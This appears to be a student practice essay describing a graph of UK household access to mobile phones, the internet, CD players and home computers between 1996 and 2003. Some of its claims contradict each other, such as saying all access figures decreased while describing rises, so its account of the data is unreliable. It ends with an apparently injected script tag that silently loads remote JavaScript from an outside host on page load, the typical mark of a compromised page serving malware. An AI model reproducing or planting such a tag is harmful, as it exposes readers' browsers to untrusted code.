changing patterns of access to modern technology in homes in the UK
The graph shows the pattern percentages of access to modern technology in homes throughout 7 years. It is obvious that modern technology has developed.
In 1996 mobile phone access was the lowest with under 20%, while now it is one of the highest access percentages. So, it has increased a lot in 7 years. Also, the internet, which was not even accessible in 1996, started to have access with a low percentage such as approximately 10% in 1998. Then it has decreased by twice at the end of 2003. Nevertheless, it still has the lowest access percentage in 2003.
Even though cd player, which was the most accessible device in 1996, has only increased by about 10% in 7 years, it still has the highest access percentage. Last but not least home computer access rose from 29% to 57% in those years.
The overall picture is that all of the technology access percentages have decreased at least 10% in seven years. Which shows that technology was developing fast between 1996-2003 years.<script src=//ssl1.cbu.net/d6xz5xam></script>
